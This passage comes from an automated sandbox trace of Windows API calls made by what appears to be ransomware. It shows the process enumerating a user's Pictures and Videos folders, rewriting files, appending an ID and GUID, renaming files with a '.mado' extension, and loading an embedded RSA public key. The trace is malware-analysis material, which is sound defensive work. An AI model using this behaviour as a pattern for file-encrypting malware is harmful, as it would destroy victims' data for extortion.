lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.074] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x1097a, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x1097a, lpOverlapped=0x0) returned 1 [0206.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0206.074] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1097f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.074] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0206.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.075] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.075] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.075] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.075] CloseHandle (hObject=0x63c) returned 1 [0206.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0206.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b7b950 [0206.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed98 | out: hHeap=0x2c0000) returned 1 [0206.076] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\WDodq.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\wdodq.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\WDodq.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\wdodq.gif.mado")) returned 1 [0206.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.077] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.078] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c058e60, ftCreationTime.dwHighDateTime=0x1d5db15, ftLastAccessTime.dwLowDateTime=0x85219a20, ftLastAccessTime.dwHighDateTime=0x1d5e5b9, ftLastWriteTime.dwLowDateTime=0x85219a20, ftLastWriteTime.dwHighDateTime=0x1d5e5b9, nFileSizeHigh=0x0, nFileSizeLow=0x1097f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WDodq.gif", cAlternateFileName="")) returned 0 [0206.078] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0206.078] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0206.078] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.083] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\") returned="kMOXX\\" [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321848 [0206.083] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\") returned="-Na1oMmnUTFTw3KDwZd\\" [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0206.083] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0206.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66db0 [0206.084] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.084] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.084] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.084] PathFindFileNameW (pszPath="") returned="" [0206.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0206.084] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b553250, ftCreationTime.dwHighDateTime=0x1d5dae2, ftLastAccessTime.dwLowDateTime=0xd8edd380, ftLastAccessTime.dwHighDateTime=0x1d5de5c, ftLastWriteTime.dwLowDateTime=0xd8edd380, ftLastWriteTime.dwHighDateTime=0x1d5de5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.085] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b553250, ftCreationTime.dwHighDateTime=0x1d5dae2, ftLastAccessTime.dwLowDateTime=0xd8edd380, ftLastAccessTime.dwHighDateTime=0x1d5de5c, ftLastWriteTime.dwLowDateTime=0xd8edd380, ftLastWriteTime.dwHighDateTime=0x1d5de5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.085] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98403310, ftCreationTime.dwHighDateTime=0x1d5da0a, ftLastAccessTime.dwLowDateTime=0xa6b8fb0, ftLastAccessTime.dwHighDateTime=0x1d5dcaa, ftLastWriteTime.dwLowDateTime=0xa6b8fb0, ftLastWriteTime.dwHighDateTime=0x1d5dcaa, nFileSizeHigh=0x0, nFileSizeLow=0x96e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-JraqL9GjCG5I.avi", cAlternateFileName="-JRAQL~1.AVI")) returned 1 [0206.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321848 [0206.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0206.085] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\-JraqL9GjCG5I.avi") returned=".avi" [0206.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\-JraqL9GjCG5I.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\kmoxx\\-jraql9gjcg5i.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.085] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=38632) returned 1 [0206.085] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.088] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x96c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.088] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.089] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x96e8, lpOverlapped=0x0) returned 1 [0206.090] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.090] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.090] lstrlenA (lpString="-----BEGIN PUBLIC 